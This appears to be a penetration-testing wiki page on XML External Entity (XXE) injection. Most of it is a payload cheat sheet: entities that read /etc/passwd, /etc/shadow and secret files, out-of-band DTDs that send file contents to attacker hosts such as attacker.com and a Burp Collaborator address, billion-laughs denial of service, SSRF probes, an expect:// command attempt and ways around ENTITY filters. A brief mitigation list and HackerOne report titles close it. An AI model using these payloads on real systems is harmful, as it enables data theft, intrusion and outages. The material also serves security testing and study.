XXE

CWE-611: Improper Restriction of XML External Entity Reference

What is XXE (XML External Entity) Vulnerability?

XML External Entity (XXE) is a type of vulnerability that occurs when an application processes user-supplied XML data without properly validating it. In XML, the term Entity refers to a storage unit of data, which can be internal (within the XML document) or external (an external file or URL). An attacker can exploit XXE to:

Read arbitrary files on the server (e.g., /etc/passwd).
Make requests to internal systems (Server-Side Request Forgery, SSRF).
Cause denial of service (DoS) by using large external entities.
Exfiltrate data by sending sensitive information to an external entity controlled by the attacker.

There are various types of XXE attacks:

XXE Attack Type

Description

Exploiting XXE to Retrieve Files

Where an external entity is defined containing the contents of a file, and returned in the application's response.

Exploiting XXE to Perform SSRF Attacks

Where an external entity is defined based on a URL to a back-end system.

Exploiting Blind XXE Exfiltrate Data Out-of-Band

Where sensitive data is transmitted from the application server to a system that the attacker controls.

Exploiting blind XXE to Retrieve Data Via Error Messages

Where the attacker can trigger a parsing error message containing sensitive data.

Methodology whitechaitai

Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "applcation/xml".
File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files.
If svg allowed in picture upload , you can inject xml in svgs.
If the web app offers RSS feeds , add your milicious code into the RSS.
Fuzz for /soap api , some applications still running soap apis
If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse

Test Payload

Using private External Entity#

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY cat "Tom">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>

Using a public External Entity#

<?xml version="1.0"?>
<!DOCTYPE data [
	<!ELEMENT data ANY >
	<!ENTITY cat SYSTEM "file:///etc/passwd">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>

CDATA

XXE that can print XML files through the CDATA:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/myapp/WEB-INF/web.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.1.5:8000/wrapper.dtd" >
%dtd;
]>
<Contact>
<lastName>&wrapper;</lastName>
<firstName>FIRSTNAME_FILLER</firstName>
</Contact>

Inside the wrapper.dtd (the external DTD file)
- Its purpose is just to wrap the variables(parameters) into
```
<!ENTITY wrapper "%start;%file;%end;">
```

Exploitation

LFI Test

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

Blind LFI test (when first case doesn't return anything)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

Access Control bypass (loading restricted resources - PHP example)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

SSRF Test

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "<https://www.example.com/text.txt>">]><foo>&xxe;</foo>

XEE (XML Entity Expansion - DOS)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

XEE #2 (Remote attack - through external xml inclusion)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "<https://example.com/entity1.xml>">]>
<lolz><lol>3..2..1...&test<lol></lolz>

XXE FTP HTTP Server

https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html

<!DOCTYPE data [
<!ENTITY % remote SYSTEM "<http://publicServer.com/parameterEntity_sendftp.dtd>">
%remote;
%send;
]>
<data>4</data>

File stored on <http://publicServer.com/parameterEntity_sendftp.dtd>

<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;

XXE UTF-7

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

To convert between UTF-8 & UTF-7 use recode. recode UTF8..UTF7 payload-file.xml

Blind XXE with out-of-band interaction

Exploit

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://604s4g1hgg9g6irk4v41hsjt2k8bw4kt.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Exploiting blind XXE to exfiltrate data using a malicious external DTD

External DTD

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;

Exploit

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>

Blind XXE with out-of-band interaction via XML parameter entities

Exploit

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>

Exploiting blind XXE to retrieve data via error messages [ DTD Blind Out-of-band ]
On the exploit server change the hosted file name to /exploit.dtd as the exploit file with Document Type Definition (DTD) extension, containing the following payload. The % is the Unicode hex character code for percent sign %. Parameter entities are referenced using the percent character instead of the usual ampersand.
```
<!ENTITY % file SYSTEM "file:///home/carlos/secret">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://COLLABORATOR.net/?x=%file;'>">
%eval;
%exfil;
```
Modify the file upload XML body of the request before sending to the target server.
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE users [<!ENTITY % xxe SYSTEM "https://EXPLOIT.net/exploit.dtd"> %xxe;]>
<users>
    <user>
        <username>Carl Toyota</username>
        <email>carlos@hacked.net</email>
    </user>    
</users>
```
Exploiting XInclude to retrieve files
File upload or user import function on web target use XML file format. This can be vulnerable to XML external entity (XXE) injection.
Identify XML
Possible to find XXE attack surface in requests that do not contain any XML.
To Identify XXE in not so obvious parameters or requests, require adding the below and URL encode the & ampersand symbol to see the response.
%26entity;
Below the server respond with indication that XML Entities are not allowed for security reasons.
```
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
URL encode the XXE payload before sending.

<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>
```
PortSwigger Lab: Exploiting XXE via image file upload
XXE via SVG Image upload
Identify image upload on the blog post function that accept svg images, and observe that the avatars already on blog source code is svg extensions.
The content of the image.svg file uploaded:
```
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///home/carlos/secret" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
```
!https://github.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/raw/main/images/xxe-svg-upload.png

Exploiting XXE to retrieve data by repurposing a local DTD

Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

XML External Entity (XXE) Injection Payloads

XXE: Basic XML Example

<!--?xml version="1.0" ?-->
<userInfo>
 <firstName>John</firstName>
 <lastName>Doe</lastName>
</userInfo>

XXE: Entity Example

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
 </userInfo>

XXE: File Disclosure

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

XXE: Denial-of-Service Example

<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

XXE: Local File Inclusion Example

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>

XXE: Access Control Bypass (Loading Restricted Resources - PHP example)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>

XXE:SSRF ( Server Side Request Forgery ) Example

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "<https://www.example.com/text.txt>">]><foo>&xxe;</foo>

XXE: (Remote Attack - Through External Xml Inclusion) Exmaple

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY test SYSTEM "<https://example.com/entity1.xml>">]>
<lolz><lol>3..2..1...&test<lol></lolz>

XXE: UTF-7 Exmaple

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

XXE: Base64 Encoded

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>

XXE: XXE inside SOAP Example

<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "<http://x.x.x.x:22/>"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>

XXE: XXE inside SVG

<svg xmlns="<http://www.w3.org/2000/svg>" xmlns:xlink="<http://www.w3.org/1999/xlink>" width="300" version="1.1" height="200">
    <image xlink:href="expect://ls"></image>
</svg>

Bypassing Filters that Block "ENTITY":

If a web application is filtering or blocking the word "ENTITY" to prevent XXE attacks, there are several bypass techniques you can try:

1. Case Manipulation:

Some filters are case-sensitive and may only block the exact string ENTITY in uppercase. You can try different cases, such as:
```
<!DOCTYPE foo [ 
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
```
Test variations like:
- <!entity>
- <!EnTiTy>

2. Use Parameter Entities:

Instead of defining an external entity directly, you can use parameter entities (which start with %) to indirectly reference the malicious entity:
```
<?xml version="1.0" ?>
<!DOCTYPE foo [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/malicious.dtd">
%dtd;
]>
<foo>&xxe;</foo>
```
The malicious .dtd file hosted on attacker.com could contain the payload for reading a file.

3. Hex Encoding:

Sometimes, filters may miss encoded characters. You can try encoding the word ENTITY using its hexadecimal or decimal representation in XML:
```
<!DOCTYPE foo [ 
<!&#69;&#78;&#84;&#73;&#84;&#89; xxe SYSTEM "file:///etc/passwd">
]>
```
This encodes "ENTITY" in decimal (69 for 'E', 78 for 'N', etc.). In hex, it would be <!ENTITY xxe SYSTEM "file:///etc/passwd">.

4. Using DTD Chaining:

If you have control over external DTDs, you can chain DTDs to bypass filters. This involves referencing a remote DTD file hosted by the attacker:
```
<!DOCTYPE foo [ 
<!ENTITY % remote SYSTEM "http://attacker.com/external.dtd">
%remote;
]>
```
The external DTD file (external.dtd) can define the malicious entity, bypassing local filters.

5. XML Comments:

Sometimes filters miss entities hidden inside XML comments. You can obfuscate the payload by breaking the word ENTITY into parts:
```
<!DOCTYPE foo [ 

<!ENT-->
]>
```

6. Base64 Encoding:

You might be able to encode the payload and then decode it at runtime. Some parsers allow you to inject base64-encoded external entities and decode them:
```
<!DOCTYPE foo [ 
<!ENTITY xxe SYSTEM "data:text/plain;base64,L2V0Yy9wYXNzd2Q=">
]>
<foo>&xxe;</foo>
```
This base64 string decodes to /etc/passwd.

7. Alternative External Sources (e.g., SYSTEM or PUBLIC):

Instead of using ENTITY, try to reference external files or URLs using alternative methods. For example:
```
<!DOCTYPE foo PUBLIC "-//OASIS//DTD Entity Resolution XML//EN" "http://attacker.com/malicious.dtd">
```
Here, the external DTD contains the payload, and you avoid using the ENTITY keyword.

Mitigation:

From a defensive perspective, to mitigate XXE attacks:

Disable external entity processing in XML parsers where it's not needed.
Use whitelisting for acceptable file or URL references in XML files.
Implement input validation to ensure only valid, trusted XML is processed.
Ensure your application is updated to use parsers that are not vulnerable to XXE by default.

References :

👉 XML External Entity (XXE) Processing

👉 XML External Entity Prevention Cheat Sheet

👉 Testing for XML Injection (OTG-INPVAL-008)

Top XXE reports from HackerOne:

XXE at ecjobs.starbucks.com.cn/retail/hxpublic_v6/hxdynamicpage6.aspx to Starbucks - 308 upvotes, $4000
XXE on pulse.mail.ru to Mail.ru - 263 upvotes, $6000
XXE on sms-be-vip.twitter.com in SXMP Processor to Twitter - 250 upvotes, $10080
XXE on https://duckduckgo.com to DuckDuckGo - 209 upvotes, $0
Phone Call to XXE via Interactive Voice Response to ██████ - 170 upvotes, $0
Partial bypass of #483774 with Blind XXE on https://duckduckgo.com to DuckDuckGo - 151 upvotes, $0
Multiple endpoints are vulnerable to XML External Entity injection (XXE) to Pornhub - 136 upvotes, $2500
XXE through injection of a payload in the XMP metadata of a JPEG file to Informatica - 128 upvotes, $0
XXE Injection through SVG image upload leads to SSRF to Zivver - 111 upvotes, $0
XXE in Site Audit function exposing file and directory contents to Semrush - 99 upvotes, $2000
[RCE] Unserialize to XXE - file disclosure on ams.upload.pornhub.com to Pornhub - 89 upvotes, $10000
XXE in DoD website that may lead to RCE to U.S. Dept Of Defense - 89 upvotes, $0
Blind XXE via Powerpoint files to Open-Xchange - 86 upvotes, $2000
blind XXE in autodiscover parser to Mail.ru - 70 upvotes, $5000
LFI and SSRF via XXE in emblem editor to Rockstar Games - 68 upvotes, $1500
Blind OOB XXE At "http://ubermovement.com/" to Uber - 55 upvotes, $500
XXE на webdav.mail.ru - PROPFIND/PROPPATCH to Mail.ru - 54 upvotes, $10000
XXE on ██████████ by bypassing WAF ████ to QIWI - 53 upvotes, $5000
[rev-app.informatica.com] - XXE to Informatica - 44 upvotes, $0
RCE via Local File Read -> php unserialization-> XXE -> unpickling to h1-5411-CTF - 43 upvotes, $0
XML External Entity (XXE) in qiwi.com + waf bypass to QIWI - 39 upvotes, $3137
Authenticated XXE to WordPress - 39 upvotes, $600
XML Parser Bug: XXE over which leads to RCE to drchrono - 32 upvotes, $700
XXE on DoD web server to U.S. Dept Of Defense - 31 upvotes, $0
Singapore - XXE at https://www.starbucks.com.sg/RestApi/soap11 to Starbucks - 28 upvotes, $500
[app.informaticaondemand.com] XXE to Informatica - 24 upvotes, $0
Blind XXE on my.mail.ru to Mail.ru - 23 upvotes, $800
Non-production Open Database In Combination With XXE Leads To SSRF to Evernote - 23 upvotes, $0
XXE in upload file feature to Informatica - 21 upvotes, $0

PreviousWebSockets NextXXE to RCE

Last updated 3 months ago